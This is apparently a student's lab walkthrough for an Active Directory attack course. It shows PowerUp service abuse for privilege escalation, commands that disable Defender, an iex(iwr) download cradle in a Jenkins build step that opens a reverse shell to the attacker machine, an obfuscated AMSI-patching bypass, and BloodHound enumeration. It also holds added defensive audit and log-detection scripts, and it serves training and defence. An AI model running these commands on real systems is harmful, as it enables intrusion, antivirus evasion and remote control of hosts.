Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False

ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False

[*] Checking service permissions...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart : True

ServiceName : SNMPTRAP
Path : C:\Windows\System32\snmptrap.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True

[*] Checking %PATH% for potentially hijackable DLL locations...

ModifiablePath : C:\Users\student163\AppData\Local\Microsoft\WindowsApps
IdentityReference : dcorp\student163
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\student163\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\student163\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...

[*] Checking for modifiable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....

[*] Checking for cached Group Policy Preferences .xml files....

PowerUp reports an unquoted service path for AbyssWebServer and, under "Checking service permissions", that the service configuration itself is modifiable, which we can use to escalate our privileges.
PS C:\Users\student163> Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student163' -Verbose
VERBOSE: Service 'AbyssWebServer' original path: 'C:\WebServer\Abyss Web Server\abyssws.exe -service'
VERBOSE: Service 'AbyssWebServer' original state: 'Stopped'
VERBOSE: Executing command 'net localgroup Administrators dcorp\student163 /add'
VERBOSE: binPath for AbyssWebServer successfully set to 'net localgroup Administrators dcorp\student163 /add'
VERBOSE: Restoring original path to service 'AbyssWebServer'
VERBOSE: binPath for AbyssWebServer successfully set to 'C:\WebServer\Abyss Web Server\abyssws.exe -service'
VERBOSE: Leaving service 'AbyssWebServer' in stopped state

ServiceAbused Command
------------- -------
AbyssWebServer net localgroup Administrators dcorp\student163 /add

Now, if we log off and log in again, we have admin privileges.
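The same two conditions PowerUp found above (a writable or unquoted service binary path, and a service DACL that lets a low-privileged principal change the service configuration) can be audited from the defender's side without any abuse step. The following PowerShell is an added example written for these notes, not part of PowerUp or the lab; it only reads ACLs and runs as a standard user. It assumes an English Windows install (the principal names BUILTIN\Users, Everyone and so on) and uses sc.exe sdshow for the service DACL, where the SDDL rights DC, WD, WO and GA correspond to SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER and GENERIC_ALL.

```powershell
# Added defensive audit (not from the lab notes): re-checks the two PowerUp findings
# above without any abuse step. (1) Service binaries whose path is unquoted and/or
# whose directories are writable by low-privileged users. (2) Service DACLs that
# grant such users SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER, the rights
# needed to rewrite binPath the way Invoke-ServiceAbuse does. Read-only; runs as a
# standard user. The principal names assume an English Windows install.

$LowPrivNames = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
                  'NT AUTHORITY\INTERACTIVE')
# Same principals as SDDL aliases / well-known SIDs, for sc.exe sdshow output.
$LowPrivSids  = @('BU', 'WD', 'AU', 'IU', 'S-1-5-32-545', 'S-1-1-0', 'S-1-5-11', 'S-1-5-4')
# 'Write' covers the WriteData/AddFile and AppendData/AddSubdirectory rights PowerUp reports.
$WriteMask    = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivNames -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServicePathFindings {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = [Environment]::ExpandEnvironmentVariables([string]$svc.PathName)
        if ([string]::IsNullOrWhiteSpace($path)) { continue }
        $quoted = $path -match '^"([^"]+)"'
        $exe = $null
        $checkPaths = New-Object System.Collections.Generic.List[string]
        if ($quoted) {
            $exe = $Matches[1]
        } else {
            # For an unquoted path Windows tries every space-delimited prefix in turn
            # ("C:\WebServer\Abyss", "C:\WebServer\Abyss Web", ...), so each prefix's
            # parent directory is a place where a planted binary would be picked up first.
            $tokens = $path -split ' '
            for ($i = 0; $i -lt $tokens.Count; $i++) {
                $prefix = $tokens[0..$i] -join ' '
                $checkPaths.Add((Split-Path -Parent $prefix -ErrorAction SilentlyContinue))
                if (Test-Path -LiteralPath $prefix -PathType Leaf) { $exe = $prefix; break }
            }
        }
        if ($exe) { $checkPaths.Add((Split-Path -Parent $exe)); $checkPaths.Add($exe) }
        $unquoted = (-not $quoted) -and $exe -and ($exe -match ' ')
        $writable = @($checkPaths | Where-Object { $_ } | Sort-Object -Unique |
                      Where-Object { Test-LowPrivWritable -Path $_ })
        if ($unquoted -or $writable.Count -gt 0) {
            [pscustomobject]@{
                ServiceName = $svc.Name
                StartName   = $svc.StartName
                Unquoted    = $unquoted
                WritableBy  = $writable -join '; '
                PathName    = $svc.PathName
            }
        }
    }
}

function Get-ServiceDaclFindings {
    # Service rights in SDDL: DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC,
    # WO = WRITE_OWNER, GA = GENERIC_ALL. ACEs written with a raw hex mask are skipped.
    $dangerous = @('DC', 'WD', 'WO', 'GA')
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $sddl = (& sc.exe sdshow $svc.Name 2>$null) -join ''
        foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]*);[^;]*;[^;]*;([^)]+)\)')) {
            $sid = $m.Groups[2].Value
            if ($LowPrivSids -notcontains $sid) { continue }
            $rights  = $m.Groups[1].Value
            $granted = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $hits = @($granted | Where-Object { $dangerous -contains $_ })
            if ($hits.Count -gt 0) {
                [pscustomobject]@{ ServiceName = $svc.Name; Principal = $sid; Rights = $hits -join ',' }
            }
        }
    }
}

Write-Host '== Service paths: unquoted or writable by low-privileged users =='
Get-ServicePathFindings | Format-Table ServiceName, StartName, Unquoted, WritableBy -AutoSize
Write-Host '== Service DACLs granting low-privileged users configuration rights =='
Get-ServiceDaclFindings | Format-Table -AutoSize
```

The fix for the first finding is to quote the path (for example sc.exe config AbyssWebServer binPath= "\"C:\WebServer\Abyss Web Server\abyssws.exe\" -service") and to remove the low-privileged write ACEs from C:\WebServer; the fix for the second is to remove DC, WD and WO for those principals from the service DACL with sc.exe sdset. On the detection side, the net localgroup command that the abuse above runs through the service shows up as Security event 4732 (a member was added to a security-enabled local group) with LocalSystem as the subject, which is a useful correlation signal.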

Disable Defender using PowerShell

Once we get administrative privileges, we disable Defender on the machine using the following commands. The commands require administrative privileges.
PS C:\Windows\system32> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\Windows\system32> Set-MpPreference -DisableBehaviorMonitoring $true
PS C:\Windows\system32> Set-MpPreference -DisableIntrusionPreventionSystem $true
PS C:\Windows\system32> Set-MpPreference -DisableIOAVProtection $true
Jenkins Feature Abuse
A misconfigured Jenkins instance is running at http://172.16.3.11:8080. Three users are present; they can be found on the People page in Jenkins.

Login works with the following username/password combinations:

manager/manager

builduser/builduser

Logged in as builduser (password builduser), jobs can be configured. Since the build needs to run with local administrative privileges, the user that runs the jobs is a local administrator on the machine where Jenkins is hosted.

A project can be modified to get a reverse shell.

Getting a Reverse Shell

Tools required
• Netcat – to configure a listener
• Invoke-PowerShellTcp.ps1 – Nishang script which can be used for a reverse or bind interactive PowerShell from a target (https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
• HFS – to host the web server for transferring the scripts between the machines.

We will slightly modify the script Invoke-PowerShellTcp.ps1 by appending the following line, which calls the function the script defines:
Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.163 -Port 443

The IP address 172.16.100.163 is our student machine. We will configure a listener on our student machine to receive a reverse shell on port 443.
C:\Windows\system32>C:\Ad\Tools\netcat-win32-1.12\nc64.exe -nvlp 443
listening on [any] 443 ...

We use HFS to host the modified PowerShell script (Invoke-PowerShellTcp_modified.ps1).

We log in to Jenkins as builduser.

Open any project in Jenkins and configure it to add a build step that runs a Windows batch command with the following command:
powershell iex (iwr -UseBasicParsing http://172.16.100.163/Invoke-PowerShellTcp_modified.ps1)
Once the project is saved, build it. When the build runs, we receive a reverse shell from the machine where Jenkins is installed.
connect to [172.16.100.163] from (UNKNOWN) [172.16.3.11] 59455
Windows PowerShell running as user ciadmin on DCORP-CI
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\.jenkins\workspace\Project9> $env:computername
DCORP-CI
PS C:\Users\Administrator\.jenkins\workspace\Project9> $env:username
ciadmin
PS C:\Users\Administrator\.jenkins\workspace\Project9> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2fe8:dbc7:9c2c:2c5c%5
IPv4 Address. . . . . . . . . . . : 172.16.3.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.3.254

Note: make sure to add a firewall exception for the listener port (or turn off the firewall) on the student VM, otherwise the reverse connection is blocked.
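Both of the activities just shown, the Set-MpPreference -Disable* commands and the "iex (iwr ...)" download cradle executed as a Jenkins build step, leave a clear trace in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, enabled through the "Turn on PowerShell Script Block Logging" policy). The following detector is an added example written for these notes, not part of the lab or of any tool it uses. The event records in it are constructed for the demonstration in the layout a 4104 message has; against a real host you would pass the function the output of Get-WinEvent instead.

```powershell
# Added detection example (not from the lab notes): flags the Set-MpPreference
# -Disable* commands and the "iex (iwr ...)" download cradle shown above in
# PowerShell Script Block Logging records (Event ID 4104). The sample events are
# constructed; on a live host use Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational'.

$SuspiciousPatterns = @(
    @{ Name  = 'DownloadCradle'
       # Invoke-Expression combined with a web fetch, in either order
       Regex = '(?i)(\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring)\b)|(\b(iwr|invoke-webrequest|downloadstring)\b.*\b(iex|invoke-expression)\b)' }
    @{ Name  = 'DefenderTamper'
       # Any Set-MpPreference -Disable<Feature> $true
       Regex = '(?i)set-mppreference\s+-disable\w+\s+\$?true' }
)

function Find-SuspiciousScriptBlock {
    # $Events: objects with Id, TimeCreated and Message (the shape Get-WinEvent returns).
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        if ($e.Id -ne 4104) { continue }            # only script block text events
        foreach ($p in $SuspiciousPatterns) {
            if ($e.Message -match $p.Regex) {
                # The second line of a 4104 message is the start of the script block text.
                $firstLine = ($e.Message -split "`r?`n")[1]
                [pscustomobject]@{ Time = $e.TimeCreated; Rule = $p.Name; Script = $firstLine }
            }
        }
    }
}

# Constructed sample records in the 4104 message layout (not real log data).
function New-SampleEvent([int]$Id, [string]$Time, [string]$Script) {
    [pscustomobject]@{
        Id          = $Id
        TimeCreated = [datetime]$Time
        Message     = "Creating Scriptblock text (1 of 1):`r`n$Script`r`n`r`nScriptBlock ID: 00000000-0000-0000-0000-000000000000"
    }
}

$SampleEvents = @(
    New-SampleEvent 4104 '2024-06-21 02:10:01' 'Get-Process | Sort-Object CPU -Descending'
    New-SampleEvent 4104 '2024-06-21 02:11:15' 'iex (iwr -UseBasicParsing http://172.16.100.163/Invoke-PowerShellTcp_modified.ps1)'
    New-SampleEvent 4104 '2024-06-21 02:12:40' 'Set-MpPreference -DisableRealtimeMonitoring $true'
    New-SampleEvent 4103 '2024-06-21 02:12:41' 'Set-MpPreference -DisableRealtimeMonitoring $true'   # pipeline event, ignored
    New-SampleEvent 4104 '2024-06-21 02:13:02' 'Invoke-WebRequest https://intranet.example/report.csv -OutFile C:\temp\report.csv'
)

Find-SuspiciousScriptBlock -Events $SampleEvents | Format-Table -AutoSize
```

The cradle rule deliberately requires both a fetch and an Invoke-Expression in the same script block, so a plain Invoke-WebRequest download to disk is not flagged. Plain string matching like this is exactly what the HtmlDecode-encoded strings in the AMSI bypass used later in this section are meant to evade, so pair it with Defender's own telemetry: Windows Defender logs Event ID 5001 in its Operational log when real-time protection is disabled, regardless of how the Set-MpPreference call was spelled.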
Domain Enumeration using BloodHound
In this section, we will explore how to use BloodHound for domain enumeration. BloodHound is a
powerful tool used to identify and analyze the relationships and permissions within an Active Directory
environment. It helps in visualizing the attack paths and determining potential privilege escalation vectors.

Introduction to BloodHound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active
Directory domain. It collects data using a tool called SharpHound and then visualizes it in an easy-to-
understand graphical interface.

Components of BloodHound
SharpHound
• Data Collection: SharpHound is the data collector for BloodHound. It gathers data from the Active
Directory environment using various collection methods.
• Executable Versions: SharpHound is available in different formats, including a PowerShell script,
a .NET executable, and a C# assembly.

BloodHound Interface
• Graph Database: BloodHound uses a Neo4j graph database to store and query the collected data.
• Visualization: The BloodHound interface provides a graphical representation of the data, allowing
users to easily visualize and explore relationships and paths within the Active Directory
environment.

Setting up BloodHound environment

Prerequisites
Note: In the lab we have BloodHound Legacy available in the C:\AD\Tools folder. We are also provided with reader access to BloodHound Community Edition.

• Java Development Kit (JDK): Neo4j, the database used by BloodHound, requires Java. Ensure you
have the JDK installed.
• Neo4j Database: BloodHound uses Neo4j to store and query data.
• BloodHound Application: The BloodHound interface for analyzing and visualizing data.

Installation of neo4j database

We have the neo4j database community edition version 4.4.5 in the C:\Ad\Tools folder.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> cd C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin
PS C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin> .\neo4j.bat install-service
Neo4j service installed.

Now the neo4j service is installed. We start the service:

PS C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin> .\neo4j.bat start
Directories in use:
home: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5
config: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\conf
logs: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\logs
plugins: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\plugins
import: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\import
data: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\data
certificates: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\certificates
licenses: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\licenses
run: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\run
Starting Neo4j.
Started neo4j. It is available at http://localhost:7474
There may be a short delay until the server is ready.

We will configure the neo4j database. For this we will open the browser and navigate to the address
http://localhost:7474. We need to login with the username neo4j and password neo4j.

Once logged in successfully, we have to provide a new password. We have used bloodhound as the new
password.

Once the configuration is complete, we can open the BloodHound interface using the following command.
C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64\BloodHound.exe

Once BloodHound opens, we can use the username neo4j and password bloodhound to login to it.

How BloodHound Collects Data

SharpHound collects data by querying the Active Directory domain using standard protocols and methods. Here are the primary methods SharpHound uses:

LDAP Enumeration
Collects information about users, groups, computers, organizational units (OUs), group memberships, and
ACLs (Access Control Lists).

SMB and RPC Enumeration

Gathers session information, local admin group memberships, and shares from domain-joined machines.

Active Directory Web Services (ADWS)

Uses ADWS to gather detailed information about user and group attributes.

Event Logs
Parses event logs to find information about logon sessions and other relevant activities.

Types of Data Collected
• Users: Information about user accounts, including their group memberships and privileges.

• Groups: Details about security groups and their memberships.

• Computers: Information about computer objects and their relationships.

• Sessions: Active logon sessions on various machines.

• ACLs: Access Control Lists for objects in the domain, detailing who has what permissions.

• Trusts: Information about domain and forest trusts.

Data Collection Methods

SharpHound can use different collection methods based on the scope and requirements of the assessment. Some of the commonly used collection methods include:

• Default: Collects a standard set of data, which is typically sufficient for most assessments.

• All: Collects all possible data, which can be more comprehensive but time-consuming.

• Stealth: Minimizes network traffic and detection risk by using fewer and less intrusive queries.

Using SharpHound
SharpHound is available in different formats, including a PowerShell script, a .NET executable, and a C#
assembly.

In our lab we will use the PowerShell script.

To bypass .NET AMSI, we will use the following code.

$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#
108;&#108;'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#
102;&#102;&#101;&#114;'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

Running the PowerShell script:

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> $ZQCUW = @"
>> using System;
>> using System.Runtime.InteropServices;
>> public class ZQCUW {
>> [DllImport("kernel32")]
>> public static extern IntPtr GetProcAddress(IntPtr hModule, string
>> procName);
>> [DllImport("kernel32")]
>> public static extern IntPtr LoadLibrary(string name);
>> [DllImport("kernel32")]
>> public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
>> dwSize, uint flNewProtect, out uint lpflOldProtect);
>> }
>> "@
PS C:\Windows\system32> Add-Type $ZQCUW
PS C:\Windows\system32> $BBWHVWQ =
>>
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#
108;&#108;'))")
PS C:\Windows\system32> $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
>>
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#
102;&#102;&#101;&#114;'))")
PS C:\Windows\system32> $p = 0
PS C:\Windows\system32> [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
True
PS C:\Windows\system32> $TLML = "0xB8"
PS C:\Windows\system32> $PURX = "0x57"
PS C:\Windows\system32> $YNWL = "0x00"
PS C:\Windows\system32> $RTGX = "0x07"
PS C:\Windows\system32> $XVON = "0x80"
PS C:\Windows\system32> $WRUD = "0xC3"
PS C:\Windows\system32> $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
PS C:\Windows\system32> [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
PS C:\Windows\system32> . C:\Ad\Tools\BloodHound-master\BloodHound-master\Collectors\SharpHound.ps1
PS C:\Windows\system32> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\student163\Desktop\shared"
2024-06-21T02:14:53.3972901-07:00|INFORMATION|This version of SharpHound is compatible with the
4.2 Release of BloodHound
2024-06-21T02:14:53.7410780-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin,
GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets,
PSRemote
2024-06-21T02:14:53.7723227-07:00|INFORMATION|Initializing SharpHound at 2:14 AM on 6/21/2024
2024-06-21T02:14:59.5887456-07:00|INFORMATION|Loaded cache with stats: 175 ID to type mappings.
181 name to SID mappings.
0 machine sid mappings.
5 sid to domain mappings.
0 global catalog mappings.
2024-06-21T02:14:59.6043610-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session,
LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-21T02:15:04.8821760-07:00|INFORMATION|Beginning LDAP search for
dollarcorp.moneycorp.local
2024-06-21T02:15:15.8976436-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-06-21T02:15:15.9131658-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-06-21T02:15:56.3983468-07:00|INFORMATION|Status: 118 objects finished (+118 2.313725)/s --
Using 79 MB RAM
2024-06-21T02:15:58.2097768-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-06-21T02:15:58.9128123-07:00|INFORMATION|Output channel closed, waiting for output task to
complete
2024-06-21T02:15:59.0846810-07:00|INFORMATION|Status: 209 objects finished (+91 3.87037)/s --
Using 81 MB RAM
2024-06-21T02:15:59.0846810-07:00|INFORMATION|Enumeration finished in 00:00:54.2178714
2024-06-21T02:15:59.2409793-07:00|INFORMATION|Saving cache with stats: 176 ID to type mappings.
182 name to SID mappings.
0 machine sid mappings.
5 sid to domain mappings.
0 global catalog mappings.
2024-06-21T02:15:59.2724980-07:00|INFORMATION|SharpHound Enumeration Completed at 2:15 AM on
6/21/2024! Happy Graphing!

The output is a zip file containing several JSON files. We upload this data to the BloodHound interface. Once the data is uploaded, we can map our Active Directory environment using graphs.
The shortest path to Domain Admins looks like this.

We can analyze the Active Directory environment with BloodHound Community Edition as well. We can follow the article to install it. Once installed, we need to download the latest SharpHound data collector and then collect the data. The command line used to collect the data with SharpHound is the same.

In the Web UI, click Cypher -> click the folder icon -> Pre-Built Searches -> Active Directory -> (scroll down) -> Shortest paths to Domain Admins.
Issue with Derivative Local Admin and BloodHound 4.2.0
The latest version of BloodHound (4.2.0) does not show the Derivative Local Admin edge in the GUI. The last version where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can use it the same way as above.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> $ZQCUW = @"
>> using System;
>> using System.Runtime.InteropServices;
>> public class ZQCUW {
>> [DllImport("kernel32")]
>> public static extern IntPtr GetProcAddress(IntPtr hModule, string
>> procName);
>> [DllImport("kernel32")]
>> public static extern IntPtr LoadLibrary(string name);
>> [DllImport("kernel32")]
>> public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
>> dwSize, uint flNewProtect, out uint lpflOldProtect);
>> }
>> "@
PS C:\Windows\system32> Add-Type $ZQCUW
PS C:\Windows\system32> $BBWHVWQ =
>>
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#
108;&#108;'))")
PS C:\Windows\system32> $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
>>
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#
102;&#102;&#101;&#114;'))")
PS C:\Windows\system32> $p = 0
PS C:\Windows\system32> [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
True
PS C:\Windows\system32> $TLML = "0xB8"
PS C:\Windows\system32> $PURX = "0x57"
PS C:\Windows\system32> $YNWL = "0x00"
PS C:\Windows\system32> $RTGX = "0x07"
PS C:\Windows\system32> $XVON = "0x80"
PS C:\Windows\system32> $WRUD = "0xC3"
PS C:\Windows\system32> $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
PS C:\Windows\system32> [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
PS C:\Windows\system32> . "C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-master\Collectors\SHarpHound.ps1"
PS C:\Windows\system32> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\student163\Desktop\shared\Bloodhound"
-----------------------------------------------
Initializing SharpHound at 2:50 AM on 6/21/2024
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups,
SPNTargets, Container

[+] Creating Schema map for domain DOLLARCORP.MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS

Status: 0 objects finished (+0) -- Using 72 MB RAM
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path CN=Schema,CN=Configuration,DC=moneycorp,DC=local
Status: 175 objects finished (+175 12.5)/s -- Using 98 MB RAM
Enumeration finished in 00:00:14.8166237
Compressing data to C:\Users\student163\Desktop\shared\Bloodhound\20240621025005_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 2:50 AM on 6/21/2024! Happy Graphing!

PS C:\Windows\system32> cd "C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64"
PS C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64> .\BloodHound.exe

We can use the same username and password we used previously. Before we upload the data, we clear the old database.
Once the data is uploaded, we search for our username (student163). In the Node Info tab, click Local Admin Rights and then click Derivative Admin Rights. This shows whether the user has derivative administrative rights on any machine.
From the screenshot, we can see that student163 has administrative privileges on the machine DCORP-STD163. The user student163 is also a member of the RDPUsers group, which has administrative privileges on the machine DCORP-ADMINSRV. So student163 also has administrative privileges on DCORP-ADMINSRV.

Note: We have tried two different versions of BloodHound Legacy in the lab and also tried enumerating the environment using BloodHound CE. Not all versions give complete results, so it is advisable to use all of them for enumeration.
Lateral Movement
Lateral movement in cybersecurity is a technique where attackers, after intruding into an organization's
network, escalate privileges, exploit vulnerabilities, and more, to gain further access to assets and
resources.

Lateral movement is not an attack by itself, but a stage leading up to an attack. Attackers use that initial
access to compromise other accounts in the network to create a massive impact. It's a tactic
predominantly used in APTs whereby the attacker stays in the network undetected for an extended period
of time to gain access to more valuable assets or resources.

The stages of lateral movement

To stay hidden, the attacker moves laterally through the network slowly and in stages. The movement can be divided into three stages:

Reconnaissance
